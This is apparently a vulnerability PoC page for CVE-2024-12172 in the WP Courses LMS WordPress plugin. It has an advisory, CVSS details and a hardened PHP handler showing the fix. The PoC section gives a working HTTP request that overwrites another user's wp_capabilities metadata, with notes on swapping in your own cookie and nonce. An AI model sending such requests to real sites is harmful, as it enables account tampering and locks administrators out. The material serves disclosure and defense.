POC details: 1227fe1550a28090de17297f5dfba8a82710e1b3

Source
Related vulnerability
Title: WordPress plugin WP Courses LMS security vulnerability (CVE-2024-12172)
Description: WordPress and WordPress plugin are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it supports hosting a personal blog site on a server running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin WP Courses LMS 3.2.21 and earlier versions contain a security vulnerability that stems from a missing capability check on the wpc_update_user_meta_option function.
Description
WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses <= 3.2.21 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Meta Update
Introduction
# CVE-2024-12172
WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses <= 3.2.21 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Meta Update

# Description

The WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpc_update_user_meta_option() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary users' metadata, which can be leveraged to block an administrator from accessing their site when wp_capabilities is set to 0.
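
As an added example (not the plugin's own source), this is how the AJAX handler described above can be hardened: the nonce check covers CSRF, `current_user_can( 'edit_user', $user_id )` supplies the missing authorization check, and an allow-list keeps protected keys such as `wp_capabilities` out of reach. The hook name reuses the `wpc_update_user_meta` action from the PoC request; the nonce action, the function name and the allowed meta-key names are hypothetical.

```php
<?php
// Vulnerable pattern, as the advisory describes it (reconstructed, not the plugin's code):
// the handler takes user_id / meta_key / meta_value from $_POST and calls
// update_user_meta() without ever asking whether the caller may edit that user.

add_action( 'wp_ajax_wpc_update_user_meta', 'example_wpc_update_user_meta_hardened' );

function example_wpc_update_user_meta_hardened() {
    // 1. CSRF: verify the nonce the request sends in the `security` field.
    //    'wpc_user_meta_nonce' is a hypothetical nonce action name.
    check_ajax_referer( 'wpc_user_meta_nonce', 'security' );

    $user_id    = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    $meta_key   = isset( $_POST['meta_key'] ) ? sanitize_key( $_POST['meta_key'] ) : '';
    $meta_value = isset( $_POST['meta_value'] )
        ? sanitize_text_field( wp_unslash( $_POST['meta_value'] ) )
        : '';

    // 2. Authorization: the check that was missing. `edit_user` is a meta
    //    capability resolved per target user; Subscribers do not hold it for
    //    other accounts, so they can only ever touch their own meta.
    if ( ! $user_id || ! current_user_can( 'edit_user', $user_id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Allow-list the keys this feature actually needs. The capabilities
    //    key is {$wpdb->prefix}capabilities (wp_capabilities with the default
    //    prefix); is_protected_meta() rejects it and other protected keys even
    //    if the allow-list is later widened carelessly.
    $allowed_keys = array( 'wpc_course_progress', 'wpc_last_lesson' ); // hypothetical keys
    if ( ! in_array( $meta_key, $allowed_keys, true ) || is_protected_meta( $meta_key, 'user' ) ) {
        wp_send_json_error( array( 'message' => 'Meta key not allowed' ), 400 );
    }

    update_user_meta( $user_id, $meta_key, $meta_value );
    wp_send_json_success( array( 'user_id' => $user_id, 'meta_key' => $meta_key ) );
}
```

Sanitizing the value with `sanitize_text_field()` also means a serialized capabilities array like the one in the PoC body can never be stored verbatim, which is the expected behaviour once only plain course-progress values are accepted.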

## Details

- **Type**: plugin
- **Slug**: wp-courses
- **Affected Version**: 3.2.21
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
- **CVE**: CVE-2024-12172
- **Status**: Active

POC
---

Notes: Grab the security nonce once logged in, change the cookie to yours, and change the ID of the user you wish to mess up.

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=xxxxxx%7C1734564259%7CqjA3YsV7vjM7q3xj2PMjfPNu99lImJXyJ75qtYZpZ7Y%7Ce3a77e785ddd92cd3be1cf8c0eb8d553e5daef113144193bed0f02383200b15c; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AvR7YQZfotoLbsTF9AhmUVwUJ; PHPSESSID=bf585dabe58fb6cf2f5f52eb40caea09; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-12-16%2021%3A32%3A49%7C%7C%7Cep%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwpr%2Fmigrated-form%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwpr; sbjs_first_add=fd%3D2024-12-16%2021%3A32%3A49%7C%7C%7Cep%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwpr%2Fmigrated-form%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwpr; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D2%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A133.0%29%20Gecko%2F20100101%20Firefox%2F133.0; wp_lang=en_US; sbjs_session=pgs%3D38%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2F; tk_qs=; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=xxxxxx%7C1734564259%7CqjA3YsV7vjM7q3xj2PMjfPNu99lImJXyJ75qtYZpZ7Y%7C8fbeacbf59bdbe9d5dd58f11d538be09210c86d5742b92993b6c2827ec0a53bb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-login.php?loggedout=true&wp_lang=en_US
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

security=91f7dcda05&action=wpc_update_user_meta&user_id=7&meta_key=wp_capabilities&meta_value=a%3a1%3a{s%3a13%3a"administrator";b:1;}
```
File snapshot

[4.0K] /data/pocs/1227fe1550a28090de17297f5dfba8a82710e1b3 └── [3.6K] README.md 0 directories, 1 file